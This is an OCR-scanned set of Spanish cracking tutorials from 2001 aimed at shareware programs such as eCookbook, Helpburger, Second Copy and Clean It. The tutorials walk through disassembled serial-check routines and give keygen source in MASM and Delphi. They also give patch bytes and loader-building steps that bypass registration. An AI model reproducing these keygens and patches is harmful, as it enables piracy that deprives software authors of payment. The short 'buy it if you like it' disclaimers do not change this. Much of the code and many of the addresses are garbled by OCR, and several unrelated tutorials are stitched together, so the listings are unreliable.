:00498833 FF4DF8 dec [ebp-08] <= Decrece el valor del tamaño del nombre 

:00498836 75B9 jne 004987F1 <= Si no se ha terminado la cadena va a 004987F1 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004987E7(C) 


| 

:00498838 8D9514FEFFFF lea edx, dword ptr [ebp+FFFFFE14] 
:0049883E 8B8618030000 mov eax, dword ptr [esi+00000318] 
:00498844 ES6B7FFAFF call 004407B4 


:00498849 8B8514FEFFFF mov eax, dword ptr [ebp+FFFFFE14] 
:0049884F E8CCC1F6EFF call 00404420 

:00498854 8BD8 mov ebx, eax 

:00498856 83FB01 cmp ebx, 00000001 <= Compara el valor de EBX 
:00498859 7C48 jl 004988A3 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004988A1(C) 


| 

:0049885B 8D9510FEFFFF lea edx, dword ptr [ebp+FFFFFE10] 

:00498861 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:00498867 E8487FFAFF call 004407B4 <= Cuenta cuántos caracteres 

:0049886C 8B8510FEFFFF mov eax, dword ptr [ebp+FFFFFE10] <= Nuestro nombre 

:00498872 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae letra por letra desde atrás 
:00498877 50 push eax 

:00498878 8D950CFEFFFF lea edx, dword ptr [ebp+FFFFFEOC] 

:0049887E 8B8618030000 mov eax, dword ptr [esi4+-00000318] 

:00498884 ES2B7FFAFF call 004407B4 <= Cuenta cuántos caracteres 

:00498889 8B850CFEFFFF mov eax, dword ptr [ebp+FFFFFEOC] <= Nuestro nombre 

:0049888F 0FB64418FF movzx eax, byte ptr [eax+ebx-01] <= Extrae letra por letra desde atrás 
:00498894 99 cdq 

:00498895 F7FB idiv ebx <= Divide EAX entre EBX (EBX tiene el total del conteo de caracteres) 
:00498897 5A pop edx <= Recupera el valor en HEX de la letra 

:00498898 OFAFDO imul edx, eax <= Multiplica EDX por EAX 

:0049889B 0155FC add dword ptr [ebp-04], edx <= Acumula el valor 

:0049889E 4B dec ebx <= Decrece EBX en 1 

:0049889F 85DB test ebx, ebx <= Compara no igual a cero 

:004988A1 75B8 ¡ne 0049885B <= Si se cumple continua hasta finalizar el nombre 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00498859(C) 


| 

:004988A3 8D9508FEFFFF lea edx, dword ptr [ebp+FFFFFEO8] 

:004988A9 8B861C030000 mov eax, dword ptr [esi+0000031C] 

:004988AF E8007FFAFF call 004407B4 

:004988B4 8B8508FEFFFF mov eax, dword ptr [ebp+FFFFFEO8] <= Nuestro código malo 
:004988BA 50 push eax <= Lo guarda en EAX 


* Possible StringData Ref from Code Obj ->"ecl1x" 


| 

:004988BB 68048D4900 push 00498D04 <= Guarda el valor ec1x en 00498D04 
:004988C0 8D95FCFDFFFF lea edx, dword ptr [ebp+FFFFFDFC] 

:004988C6 8B8618030000 mov eax, dword ptr [esi+00000318] 

:004988CC E8E37EFAFF call 004407B4 

:004988D1 8B85FCFDFFFF mov eax, dword ptr [ebp+FFFFFDFC] 

:004988D7 E844C1F6FF call 00404A20 

:004988DC 8D9500FEFFFF lea edx, dword ptr [ebp+FFFFFEOO] 

:004988E2 E81DO7F7FF call 00409004 

:004988E7 FFB500FEFFFF push dword ptr [ebp+FFFFFEOO] 

:004988ED 68148D4900 push 00498D14 

:004988F2 8D95F8FDFFFF lea edx, dword ptr [ebp+FFFFFDF8] 

:004988F8 8BC7 mov eax, edi <= Mueve el valor de EDI a EAX, es el valor del cálculo 
:004988FA E80507F7FF call 00409004 <= Transforma el valor a Decimal 
:004988FF FFB5F8FDFFFF push dword ptr [ebp+FFFFFDF8] 


* Possible StringData Ref from Code Obj ->"g-w" 


| 

:00498905 68208D4900 push 00498D20 <= Guarda el valor g-w en 00498D20 
:0049890A 8D95F4FDFFFF lea edx, dword ptr [ebp+FFFFFDF4] 

:00498910 8B45FC mov eax, dword ptr [ebp-04] <= El valor del segundo cálculo en HEX 
:00498913 ESECO6F7FF call 00409004 

:00498918 FFB5F4FDFFFF push dword ptr [ebp+FFFFFDF4] 

:0049891E 8D8504FEFFFF lea eax, dword ptr [ebp+FFFFFEO4] 

:00498924 BA06000000 mov edx, 00000006 


:0049892E 8B9504FEFFFF mov edx, dword ptr [ebp+FFFFFEO04] <= Lo mueve a EDX 
:00498934 58 pop eax 

:00498935 E82AC2F6FF call 00404B64 <= Va a hacer la comparación de seriales 
:0049893A 0F85B3020000 jne 00498BF3 <= Si es malo ¡Error! 

:00498940 B201 mov dl, 01 


:00498942 A1A0194600 mov eax, dword ptr [004619A0] 


Si abre el registro de Windows y ves en Software/Code6/eCookbook encontrarás un clave de nombre Key y 
otra de nombre Registrant, además si ves en el directorio en donde está instalado el programa verás un 
nuevo archivo de nombre eCookbook.key que contiene nada más y nada menos el serial que hemos 
generado. Este se compara con el Key del registro y si no coinciden dá error. 


Ahora vamos a ver como nos quedaría nuestro programa ya generado o nuestro código fuente en MASM, pero 
antes quiero decirles que parte de este programa está basado en el buen trabajo que ha hecho en sus 
tutoriales mi buen amigo CaoS ReptantE, Mr Crimson (¿Cómo crackear con ASM?) y JOTAKE. Ok, allí va el 
código... me limito a poner como siempre únicamente las rutinas de generación del serial pues el rsrc.rc y el 
inicio del keygen.asm están más que comentados en los tutoriales de quienes ya mencioné. 


La rutina de DECIMAL ha sido gentilmente donada por CaoS ReptantE 


Este es mi primer programa en ASM les ruego me perdonen si encuentran algun error o algo que se pueda 
mejorar 


Operacion proc 


invoke Istrlen, ADDR nombre 
lfeax<6 

mov eax,1 

ret 
.endif 


pushad 

mov edi, offset nombre 

mov esi, offset serial 

mov dword ptr[esil,78316365h 
add esi,4 

push eax 


If eax < 10 
add eax,30h 
mov dword ptr[esi],eax 
jmp paso3 

.endif 


pop eax 
add esi,1 
mov ecx, 10 
push eax 
pasol: cmp eax, ecx 
jb paso2 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esil, dl 
dec esi 
jmp pasol 
paso2: add al, 30h 
mov byte ptr [esil, al 
add esi,1 


paso3: mov ebx, 1 
pop eax 
mov edx, eax 
xXOr ecx, ecx 
push eax 


calc1: movzx eax, byte ptr [edi+edx-01] 

imul eax, eax 

add ecx, eax 

add ecx, ebx 

inc ebx 

dec edx 

jne calcl1 

add esi,1 


mov dword ptr[esil,2Dh 
.IHfecx < 186A0h 
add esi,5 
mov ebx,5 
.else 
add esi,6 
mov ebx,6 
.endif 
push ebx 
mov eaX, ecx 
invoke Decimal 
pop ebx 
add esi,1 
mov dword ptr[esil,772D67h 
add esi,2 
pop eax 
mov ebx, eax 
mov edi, offset nombre 
push esi 
xor esi, esi 


calc2: movzx eax, byte ptr [edi+ebx-01] 
mov ecx,eax 
cdq 
idiv ebx 
imul ecx, eax 
add esi, ecx 
dec ebx 
test ebx, ebx 
jne calc2 
mov ecx, esi 
pop esi 
.IHfecx < 186A0h 
add esi,5 
mov ebx,5 
.else 
add esi,6 
mov ebx,6 
.endif 
mov eaX, ecx 
invoke Decimal 


popad 

ret 
Operacion endp 
Decimal proc 


xor ebx, ebx 
mov ecx, 10 
dividir: 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esi+ebx], dl 
dec ebx 
If eax>9 
jmp dividir 
.endif 
add al, 30h 
mov byte ptr [esi+ebx], al 
ret 


Decimal endp 


end start 


6 eCookbook vl.0 


Nombre [ByTESCAK 
Selial [ec1 :8-545729-418773 


Calcula Copiar | 


Ahora ya podemos usar el programa, aunque sin embargo quiero que recuerdes, lo de siempre... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si ha USTED, le gusta el producto por favor 
COMPRELO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE (¡Gracias nuevamente por tus 
consejos y apoyo incondicional!) y a todos los crackers hispanohablantes, en especial a ti por que has 
llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: Helpburger v1.58-R1 B32 

PROTECCION: Serial 

Objetivo: Obtener un serial válido, Crear un loader 

eecion: Ua peo9tama que permite la creación de archivos de 
ayuda de Windows 

Dificultad: Novato 

DOWNLOAD : http: //www.langdaledesigns.co.uk/hb/hb_setup.exe 

Herramientas: OllyDBG, W32DASM, Princess Sandy 

CRACKER: ByTESCRK FECHA: 18/11/2001 


INTRODUCCION 


Hola, ¿como están?, habia pensado hacer un cuarto tutorial, sin embargo, no sobre 
esto, pero debido a que deseo aclarar algunas dudas, de que hacer respecto a algunas 
situaciones que a veces surgen, como por ejemplo: ¿qué hacer si ingresamos un serial 
y el programa no dice si es bueno o malo, si no que sigue siendo “sin registrar”?, es 
debido a eso que ha surgido este tuto y la forma de crackeo que yo en lo personal 
llamo "la puerta trasera". 


AL ATAKE 


Antes que nada vamos a empezar cargando el OllyDB, este programa es muy sencillo y fácil de usar, 
algunas ya se habrán preguntado, ¿por qué usa el solo programas para windows?, ¿por qué creen?, 
por que mi sistema operativo es Windows Millennium y por no estar reinstalando mi software a cada 
momento, es por eso que lo uso. Pero bueno volvamos a lo nuestro estre programa es muy intuitivo, 
¡seguramente sus autores habrán pasado algún tiempo diseñando su protección, la cual no explicaré, 
¡puesto que aún no entiendo aún a cabalidad, sin embargo, hay algunos puntos que no consideraron. 


¡Teclas de ayuda para OllyDBG 


F2 = Poner y quitar un punto de ruptura 
F7 = Entrar en una call 

F8 = Tracear paso a paso 

F9 = Tracear al final 

Enter = Entrar en la call sin tracer 


Analizando a nuestra victima 
Cargamos el programa y presionamos F4, se abren nuestras opciones, hacemos clic en la pestaña Registration 


1.- Ingresamos un nombre por ejemplo ByT'ESCRK en la casilla Copyright Message 
2.- Ingresamos un número de serie por ejemplo 123456 
3.- Clic en Ok y no nos dice nada, al ir a Help > About... vemos que sigue sin registrar 


¿Qué buscar? 


Al usarlo nos damos cuenta que no activa, la casillo No Splash screen. Vamos a la ayuda y vemos los 
beneficios por ser usuarios registrados. 


Benefits of Registration 


Unlocked features - When you register Helpburger, you will be emailed a registration code which you enter 
into the Helpburger registration options screen. This code unlocks the restrictions in the trial version : 


- No limit on number of help topics - the trial version is limited to a maximum of 20 topics in a help 
project. With the registered version, you can have as many topics as you like 


- Your title and copyright message in your finished help file. The trial version uses fixed messages. 
Registering makes your finished help files look more professional. 


- Automatic replacement of abbreviations as you type - saving a lot of your time as you can automatically 
insert frequently used words and phrases into your help file with less typing and less mistakes (see options). 
This feature is similar to Microsoft Word's 'Autocorrect' feature. 


- Improved options and preferences selection - including the option of disabling the splash screen when the 
program starts, and you gain complete control over your help file source by being able to fine tune the help 
project source-code before it is converted to a help file. 


Y en especial cuando creamos nuestro archivo de ayuda sale un título "Created by an unregistered version of 
Helpburger", odio eso. Ok estos son los puntos que atacaremos, pero en especial uno el de usuario registrado, 
entonces empecemos. 


Decompilamos el programa en W32DASM y una vez su código pueda verse, buscamos la cadena 
“unregistered”, viendo en las Reference Strings encontramos una y arriba otra que dice “ Registered”, 
hacemos doble clic 


sobre ella. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:004859C7(U) 


:004859F2 ES654D0000 call 0048A75C  <-Vamos a poner un punto de ruptura aquí 
:004859F7 84C0 test al, al <-Sial=0 

:004859F9 7431 je 00485A2C <- al =0 entonces ir a 00485A2C 

:004859FB 8D55EC lea edx, dword ptr [ebp-14] 

:004859FE 8B45FC mov eax, dword ptr [ebp-04] 


:00485A01 8B80D8020000 mov eax, dword ptr [eax+000002D8] 
:00485A07 ESA4ASEFAFF call 004302B0 
:00485A0C 8D45EC lea eax, dword ptr [ebp-14] 


* Possible StringData Ref from Code Obj ->" Registered" <- Caemos aqui, investigamos para arriba. 


:00485A0F BAACSA4800 mov edx, 00485AAC 
:00485A 14 ESSFE3F7FF call 00403D78 
:00485A19 8B55EC mov edx, dword ptr [ebp-14] 


Aquí debiera de aparecer el código del “ Unregistered”, pero ha sido omitido. 
Entrando en la llamada vemos lo siguiente... 


* Referenced by a CALL at Addresses: 
|:0047AAD6 , :0047B3BC , :0047E9DD , :0047FC7E , :004859F2 
[:004862D2 , :0048BDED , :0048BE06 , :0048C813 , :0048E9BD 


[:0048F50C 

:0048A75C 55 push ebp 
:0048A75D 8BEC mov ebp, esp 
:0048A75F 51 push ecx 


:0048A760 C645FF00 mov [ebp-01], 00 


* Possible StringData Ref from Code Obj ->"HB4"<- Algo así como un tipo de Service Pack 


:0048A764 B990A74800 mov ecx, 0048A790<- Recibe el valor HB4 

:0048A769 8B152C894900 mov edx, dword ptr [0049892C] 

:0048A76F A128894900 mov eax, dword ptr [00498928]<- Lleva nuestro serial malo 
:0048A774 ESA7AAFEFFF call 00485220<- Entramos aqui 

:0048A779 84C0 test al, al 

:0048A77B 7404 je 0048A781 

:0048A77D C645FFO1 mov [ebp-01], 01 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0048A77B(C) 


:0048A781 8A45FF mov al, byte ptr [ebp-01]<- Si deseamos crackearlo cambiemos esto por B00190 
:0048A784 59 pop ecx 

:0048A785 5D pop ebp 

:0048A786 C3 ret 


Pero, como nuestra intención es encontrar el serial correcto entramos a la llamada en 0048A774 y 
encontramos 
esto, la rutina de generación del serial. 


* Referenced by a CALL at Address: 
[:0048A774 


:00485220 55 

:00485221 8BEC 
:00485223 83C4E8 
:00485226 894DF'4 
:00485229 8955F8 
:0048522C 8945FC 
:0048522F C645F300 
:00485233 837DF800 
:00485237 7427 
:00485239 8B55F4 
:0048523C 8B45F8 
:0048523F ESBOFDFFFF 
:00485244 8945E8 
:00485247 33D2 
:00485249 8B45FC 
:0048524C E8032EF8FF 
:00485251 8945EC 
:00485254 8B45EC 
:00485257 3B45E8 
:0048525A 7504 


push ebp 

mov ebp, esp 

add esp, FFFFFFES 

mov dword ptr [ebp-0C], ecx 

mov dword ptr [ebp-08], edx 

mov dword ptr [ebp-04], eax 

mov [ebp-0D], 00 

cmp dword ptr [ebp-08], 00000000 <- Verifica que no sea nulo 
je 00485260  <- Si el serial es nulo brinca a 00485260 

mov edx, dword ptr [ebp-0C] 

mov eax, dword ptr [ebp-08] 

call 00484FF4  <- Esta es la rutina de generación del serial 
mov dword ptr [ebp-18], eax  <- Aqui ya nos aparece el serial en eax 
xor edx, edx 

mov eax, dword ptr [ebp-04] <- Recibe nuestro serial 
call 00408054  <- Aqui chequea nuestro serial 

mov dword ptr [ebp-14], eax 

mov eax, dword ptr [ebp-14] 

cmp eax, dword ptr [ebp-18]  <- Compara los dos seriales 

jne 00485260  <- Si no son iguales brinca a 00485260 


:0048525C C645F301 
:00485260 8A45F3 
:00485263 8BES mov esp, ebp 

:00485265 5D pop ebp 

:00485266 C3 ret <- Retorna con al = 0 si el serial es malo o al = 1 si es bueno 


mov [ebp-0D], 01  <- Si brinca no guarda el valor 1 en ebp-0D 
mov al, byte ptr [ebp-0D]  <- Si ha brincado ebp-0D = 0 


Al momento de estar en 00485244 podemos hacer clic en EAX en los registros al lado superior derecho y 
presionar enter, veremos el valor que tiene EAX en mi caso es igual a 01727377h o lo que es igual a 
decir 2427777%d 


CREANDO EL LOADER 


Primeramente bajarnos el programa Princess Sandy de Eminence, luego vamos a cargarlo, sabemos que 


la dirección que tenemos que modificar es 00485260, cargamos el programa y nos pide el nombre del 
programa que queremos parchar, al nosotros asignárselo ya podemos ver la ventana principal del programa, 
luego hacemos clic en el botón Add Item, nos aparece otra ventanita, ingresamos la dirección 00485260, la 
instrucción original en HEX (8A45F3), luego nuestra instrucción a modificar siempre en HEX (B00190), clic 
en Add y si ya no vamos a parchar en BUILD, nos pedirá el nombre el programa loader, hacemos clic en 
Guardar y listo, nuestro loader ha sido creado y tendremos una versión registrada hasta que esta cambie (si 
entramos en la call de la generación del serial podemos ver HB, HB2, HB3, HB4, SR, vemos la evolución del 
programa y que las rutinas de generación están enlazadas). Recuerden que es mejor un serial que un parche o 
que un loader pues con un serial podemos ingresarlo una y otra vez si el autor del programa no lo cambia, 

ero tenemos que estar creando un parche para cada nueva versión del programa al no tener este y eso nos 
he más difícil la vida. 


Asi tambien quiero invitarlos a que puedan considerar otras herramientas, como por ejemplo, el ScAEvoLa's 
PatchEngine v1.33, Topo, VeoVeo (para activar las casillas deshabilitadas), ya que este es un programa que 
se presta para muchas cosas. 


Eso es todo, ahora ya hemos generado nuestro propio serial o nuestro keygen, antes que nada no está demás 
decirles que 


"Si les gusta el programa paguen por él" 
No me responsabilizo por el mal uso de este tutorial, el fin principal es "Aprender Más". 


Un saludo para Karpoff, CaoS_Reptante, Profesor X y a todos los crackers hispanohablantes. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 1999-2001 
Second Copy 6.0 


PROTECCION: Serial 

Objetivo: Obtener un serial válido. 

Descripcion: 299222297 

Dificultad: INICIADO 

DOWNLOAD: 2299997 

Herramientas: Softice 

CRACKER: MrRidk FECHA: 18/11/2001 


INTRODUCCION 


Wenassssssssssss !!!, cuanto tiempo sin escribir ni un solo tutorial :). Esta vez vuelvo a la carga con una proteccion 
que a mi me ha resultado ' curiosa ', pero todo a su tiempo ;-)... Como siempre si tienes alguna duda, mandame un 


e-mail a: ridkG+hotmail. com 


AL ATAKE 


Weno, weno, weno .. pues como ya dije el algoritmo de generacion del serial del programa, es un tanto ' curioso ', y te 
preguntaras .. pq ?, pues pq para generar el serial, se basa ademas de en el nombre en el propio serial. El serial se divide en 
2 partes... 


La primera se usa para generar la segunda ... de la siguiente forma .. 


Se genera un numero de 4 digitos ( en hexadecimal ). Ese numero ya pasado a string se situa delante del nombre. Y tras 
hacer un bucle conseguimos el resto del serial .. el cual sera un numero hexadecimal, que dejaremos tal cual se vea .. 
dividiendolo por la mitad con un *-*, Quedando asi el tipo de serial XXXX-BBBB-BBBB, siendo las XXXX la primera parte y las 
BBBB-BBBB el resto del serial ( el calculado ). Asi pues para genera el serial, el bucle lo realiza con esos 4 digitos mas el 
nombre pasado a mayusculas ( XXXX+NombreENMaysucuas). 


Bien empezemos con el meollo de la cuestion .. para empezar ejecutamos el programa... y le damos a la opcion de introducir 
serial .. tras esto nos aparece una ventana pidiendo nombre y key ... Ejecutamos nuestro adorable soft-ice y ponemos los 
breakpoints reglamentarios ( bpx GetWindowTextA; Bpx GetDlgltemTextA, Bpx HMemcpy ). 


En esta ocasion salta el HMemcpy .. asi que damos F12 hasta conseguir entrar en el codigo del programa .. una vez alli 
vamos traceando a lo largo de un buen numero de ret's, hasta que veamos codigo seguido, es decir sin un ret 5 instrucciones 
mas para abajo. 


Ahora toca tracear con F8, durante un BUEN rato ;-). Buscando lugares donde se acceda a la info del nombre, 
multiplicaciones .. etc. 


Bien el algoritmo tiene tres puntos clave ... el primero se trata de comprobar si los 4 primeros caracteres del serial son 'X' y 
en tal caso pasarlas a '0"...esto lo hace asi .. 


:004A547D 8B45F8 mov eax, dword ptr [ebp-08] // Cogemos caracter 

:004A5480 807C18FF58 cmp byte ptr [eax+ebx-01], 58 // Miramos si es 'X' = 58h 
:004A5485 750D ¡ne 00445494 // Sino es saltamos 

:004A5487 8D45F8 lea eax, dword ptr [ebp-08] 

:004A548A ES859ECF5FF call 004040E8 

:004A548F C64418FF30 mov [eax+ebx-01], 30 // Pero si es una 'X' ponemos un '0' = 30h 


En la 22 parte ... se trata de pasar el nombre a mayusculas .. para ello comprueba si esta en 'a' y 'Z' y si es asi la eleva a 
mayusculas ... Lo hace de esta manera ... 


:00408975 8A02 mov al, byte ptr [edx] // Coge caracter 
:00408977 3C61 cmp al, 61 

:00408979 7206 jb 00408981 // entre 'a' ... 

:0040897B 3C7A cmp al, 7A 

:0040897D 7702 ja 00408981 // ... y 'Z 

:0040897F 2C20 sub al, 20 // de ser asi .. le pasa a mayusculas 


Y la tercera parte es la propia de generacion el serial ... y es esta .. 


:004A55E5 8A4410FF mov al, byte ptr [eax+edx-01] // Cogemos caracteres 

:004A55E9 3C20 cmp al, 20 // Miramos que no sea un espacio en blanco 

:004A55EB 750€ jne 004A55F9 

:004A55ED 648F0500000000 pop dword ptr fs:[O00000000] 

:004A55F4 83C408 add esp, 00000008 

:004A55F7 EB2E ¡mp 00445627 

:004A55F9 8B55FC mov edx, dword ptr [ebp-04] 

:004A55FC 8B4DF4 mov ecx, dword ptr [ebp-0C] 

:004A55FF 25FFO00000 and eax, OOOOOOFF 

:004A5604 F7EB imul ebx // Multiplicamos el valor del caracter por el contenido de ebx ( en principio = 14DAFHh ) 
:004A5606 030520B94C00 add eax, dword ptr [004CB920] // Sumamos ese valor al valor que salio en la pasada anterior del 
bucle .. 

:004A560C 8BD8 mov ebx, eax // Ponemos en ebx el valor que hemos calculado .. para usarlo en la siguiente pasada 
:004A560E 33C0 xor eax, eax // Borramos eax 

:004A5610 5A pop edx 

:004A5611 59 pop ecx 

:004A5612 59 pop ecx 

:004A5613 648910 mov dword ptr fs:[eax], edx 

:004A5616 EBOF ¡mp 00445627 

:004A5618 E9BFDDF5FF jmp 004033DC 

:004A561D BBE7030000 mov ebx, 000003E7 

:004A5622 ES11E1F5FF call 00403738 

:004A5627 FF45F4 inc [ebp-0C] 

:004A562A FF4DE8 dec [ebp-18] 

:004A562D 75A2 ¡ne 004A55D1 // Si aun no hemos acabdo volvemos arriba. 


Weno pues eso era todo .. no es demasiado dificil verda ? ;P 


Bien ahora toca elaborar el keygen, usaremos delphi para esta labor ;P. Ahora pensemos .. tenemos 2 opciones .. que los 4 
primeros numeros del serial sean fijos.. o bien que sean aleatorios .. Yo voy a usar la 22 opcion ;). 


Un posible codigo del serial seria el siguiente ... 


function calculanombre(Nombre2 : string) : String; 
var 

Ebx, Ecx, Esi, Edx,Esi2: Dword; 

i: Integer; 

Texto : String; 

Temp : Integer; 

begin 

Temp := Random(65535); 

Texto := IntToHex(Temp, 4) +UPPERCASE(Nombre2); 
Esi := $14DAF; 

Esi2 := $14DAF; 

For | := 1 to Length(Texto) do begin 

If Texto[i] <> ' ' then begin 

Ebx := Ord(Texto[! 1); 

Edx := Ebx * Esi; 

Ecx := Edx + Esi2; 

Esi := Ecx; 

end; 

end; 

Result := | ntToHex(Temp, 4) +*-'+Copy(l| ntToHex(Esi,8), 1,4) +*-'+Copy(I ntToHex(Esi, 8),5,4); 
end; 


Y esto es todo .. no ha sido muy dificil , verdad ? ;-). Como siempre si algo no esta claro o teneis sugerencias, criticas etc .. 


mandadme un mail a: ridkfhotmail. com 
[FINALIZANDO 


Weno gente, pues esto es todo por ahora .. un saludo para toda la gente de ECC [Extreme Computing Corel. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


Todos 


los de Skylark Utilities 


Name / Serial, Limitación de Tiempo 


Encontrar un serial 


válido 


Algunas buenas util 
LE 


Aficionado. 


lerías, en lo personal me gustan Find It y Part 


Victimas aqui > http://www.skylarkutilities.com 


Softice, W32dasm 


ByTESCRK 


FECHA: 13/10/2001 


INTRODUCCION 


Ok, en este Octavo tuto, vamos a escoger a una de las victimas, yo he escogido, Clean It v3.02 bastante 
nuevo, su última versión es del 05 de Octubre de 2,001. 


Este programa fué hace ya como año y medio FREEWARE, en sus primeras versiones, luego pasó a ser 
SHAREWARE, con un precio de $14.95, en lo personal considero que es mucho valor para lo que hace, hay 
algunos otros que limpian más cosas y dan menos problemas, por ejemplo, la victima que he cedido a mi 
buen amigo CaoS ReptantE en su tuto sobre "Parche Inteligentes" es uno de los mejores en su género. Pero 
bueno cada uno le pone un precio a las cosas y el autor de este programa no iba a ser la excepción, sin 
embargo, en mi caso hubiese preferido que fuera siempre FREEWARE. 


Pero pongámonos prestos y dispuestos y vayámonos... 


AL ATAKE 


De acuerdo ya que tenemos a nuestra victima descargada e instalada, la ejecutamos y nos vamos a Help > Register Info 
> Enter Keycode... rellenamos las cajas de texto y clic en Register y... nos da el mensaje de error 


Today just doesn't seem to be your day! 
The Name and/or KeyCode entered is invalid! 


Salimos y vamos a desensamblarla con W32DASM, vemos en las Reference Strings por el error y 
llegamos a 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0040A35E(C) <= Investigamos aqui... 


:0040A3D8 8B560C mov edx, dword ptr [esi+0C] 
:0040A3DB 6430 push 00000030 


* Possible StringData Ref from Data Obj ->"Registration Failed" 


| 
:0040A3DD 68FC764100 push 004176FC 


* Possible StringData Ref from Data Obj ->"Today just doesn't seem to be your day!" 


:0040A3E2 6844764100 push 004176A4 
:0040A3E7 52 push edx 


* Reference To: USER32.MessageBoxA, Ord:01BEh 


:0040A3E8 FF15B4424100 Call dword ptr [004142B4] 
:0040A3EE 8B460C mov eax, dword ptr [esi+0C] 
:0040A3F1 68810C0000 push 00000C81 

:0040A3F6 50 push eax 


Al ir a 0040A35E vemos esto... 


:0040A352 8BCF mov ecx, edi 

:0040A354 8BD8 mov ebx, eax 

:0040A356 E8E5000000 call 00404440 <= Vamos a entrar aqui... 
:0040A35B 3BC3 cmp eax, ebx <= Compara EAX y EBX 
:0040A35D 5B pop ebx 

:0040A35E 7578 jne 0040A3D8 <= Vamos al mensaje de error si no coinciden 
:0040A360 8B5638 mov edx, dword ptr [esi+38] 

:0040A363 8B4FE44 mov ecx, dword ptr [esi+44] 

:0040A366 83C128 add ecx, 00000028 

:0040A369 8B420C mov eax, dword ptr [edx+0C] 

:0040A36C 8D542418 lea edx, dword ptr [esp+18] 

:0040A370 50 push eax 

:0040A371 51 push ecx 


* Possible StringData Ref from Data Obj ->"Thank you %s for registering my " 
->"program %s and for helping to " 
->"support shareware." 


:0040A372 6828774100 push 00417728 
:0040A377 52 push edx 


Entrando en la llamada a 00404440 vemos que aqui es toda la creación y comparación de nuestro serial, si vemos en 
W32DASM, vemos que hay varios saltos a esta dirección o comprobaciones del serial correcto 


* Referenced by a CALL at Addresses: 
|:0040106A , :00401735 , :00404462 , :00408327 , :004083F2 
|:0040A356 


:0040A440 83EC18 sub esp, 00000018 

:0040A443 A17C774100 mov eax, dword ptr [0041777C] 
:0040A448 53 push ebx 

:0040A449 55 push ebp 

:0040A44A 56 push esi 

:0040A44B 8B31 mov esi, dword ptr [ecx] 

:0040444D 57 push edi 

:0040A44E 894C2418 mov dword ptr [esp+18], ecx 
:0040A452 8944241C mov dword ptr [esp+1C], eax 
:0040A456 8D7E28 lea edi, dword ptr [esi+28] 
:0040A459 83C9FE or ecx, FFFFFFFF 

:0040A45C 33C0 xor eax, eax 

:0040A45E 897C2424 mov dword ptr [esp+24], edi 
:00404462 E2 repnz 

:0040A463 AE scasb 

:0040A4464 F7D1 not ecx 

:0040A466 49 dec ecx 

:0040A467 33ED xor ebp, ebp 

:0040A469 8D5C241C lea ebx, dword ptr [esp+1C] <= Vemos el valor CLN y lo anotamos 
:0040A46D 894C2420 mov dword ptr [esp+20], ecx 
:0040A471 33FF xor edi, edi 

:0040A473 896C2410 mov dword ptr [esp+10], ebp 
:0040A4477 FF15D4404100 Call dword ptr [004140D4] 
:0040A47D 8BC8 mov ecx, eax 

:0040A47F 8A06 mov al, byte ptr [esi] 

:0040A481 84CO0 test al, al 

:0040A483 894C2414 mov dword ptr [esp+14], ecx 
:0040A487 7415 je 0040A49E 

:0040A489 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A48B 7411 je 0040A449E <= Vamos aqui... 


:0040A49E 8A16 mov dl, byte ptr [esi]. <= Caemos aqui 

:0040A4A0 46 inc esi 

:0040A4A1 SOFA2D cmp dl, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4A4 740A je 0040A4BO <= Vamos aqui... 

:0040A4A6 SF pop edi 

:0040A4A7 SE pop esi 

:0040A4A8 5D pop ebp 

:0040A4A9 8BC1 mov eax, ecx 

:0040A4AB 5B pop ebx 

:0040A4AC 83C418 add esp, 00000018 

:0040A4AF C3 ret <= Aqui salimos... 

:004044B0 8A06 mov al, byte ptr [esi]. <= Caemos aqui 

:0040A4B2 8400 test al, al 

:0040A4B4 7436 je 0040A4EC 

:0040A4B6 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4B8 7432 je 0040A4EC <= Vamos aqui... 


:0040A4EC 8A06 mov al, byte ptr [esi]_ <= Caemos aqui 

:0040A4FE 46 inc esi 

:0040A4EF 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A4F1 740A je 0040A4FD <= Vamos aqui... 


:0040A4FD 8A06 mov al, byte ptr [esi]_ <= Caemos aqui 

:0040A4FF 84CO0 test al, al 

:0040A501 7436 je 0040A539 

:0040A503 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A505 7432 je 0040A539 <= Vamos aqui... 


:0040A539 8A16 mov dl, byte ptr [esi]. <= Caemos aqui 

:0040A53B 46 inc esi 

:0040A53C S0FA2D cmp dl, 2D <= Vamos a forzar a AL para que su valor sea 2D 
:0040A53F 740A je 0040A54B <= Vamos aqui... 


:0040A54B 8A06 mov al, byte ptr [esi]. <= Caemos aqui 

:0040A54D 84CO0 test al, al 

:0040A54F 7442 je 0040A593 

:0040A551 3C2D cmp al, 2D <= Vamos a forzar a AL para que su valor sea 2D 
